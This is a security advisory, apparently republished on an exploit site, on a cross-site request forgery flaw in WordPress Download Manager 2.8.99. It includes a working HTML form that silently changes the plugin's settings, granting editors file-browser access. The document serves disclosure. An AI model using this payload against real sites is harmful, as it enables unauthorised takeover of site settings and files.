Advertisement
| CVE | Category | Price | Severity |
|---|---|---|---|
| N/A | CWE-352 | Not specified | High |
| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Not specified | High | Remote | 2017-03-03 |
WordPress Download Manager 2.8.99 Cross Site Request Forgery ------------------------------------------------------------------------ Cross-Site Request Forgery in WordPress Download Manager Plugin ------------------------------------------------------------------------ Burak Kelebek, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Request Forgery vulnerability has been found in the WordPress Download Manager Plugin. By using this vulnerability an attacker can change confidential settings of the plugin. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160722-0005 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on WordPress Download Manager version 2.8.99. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ There is currently no fix available. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_download_manager_plugin.html The Download Manager plugin lacks a CSRF (nonce) token on the request of saving settings. Because of this an attacker is able to change confidential settings like file browser access and browser base dir by luring a logged-in admin to follow a malicious link containing the proof of concept below. Proof of concept The proof of concept below gives file browser access to a user with Editor privileges: <html> <body> <form action="http://<target>/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="task" value="wdm_save_settings"/> <input type="hidden" name="action" value="wdm_settings"/> <input type="hidden" name="section" value="basic"/> <input type="hidden" name="wpdm_permission_msg" value="Access Denied"/> <input type="hidden" name="wpdm_login_msg" value="<a href='http://<target>/wp-login.php'>Please login to download</a> "/> <input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-default/"/> <input type="hidden" name="_wpdm_file_browser_access[]" value="editor"/> <input type="hidden" name="_wpdm_file_browser_access[]" value="administrator"/> <input type="hidden" name="__wpdm_sanitize_filename" value="0"/> <input type="hidden" name="__wpdm_download_speed" value="4096"/> <input type="hidden" name="__wpdm_download_resume" value="1"/> <input type="hidden" name="__wpdm_support_output_buffer" value="1"/> <input type="hidden" name="__wpdm_open_in_browser" value="0"/> <input type="hidden" name="_wpdm_recaptcha_site_key" value=""/> <input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/> <input type="hidden" name="__wpdm_disable_scripts[]" value=""/> <input type="hidden" name="__wpdm_login_url" value=""/> <input type="hidden" name="__wpdm_register_url" value=""/> <input type="hidden" name="__wpdm_user_dashboard" value=""/> <input type="submit"/> </form> </body> </html>
Copyright ©2024 Exploitalert.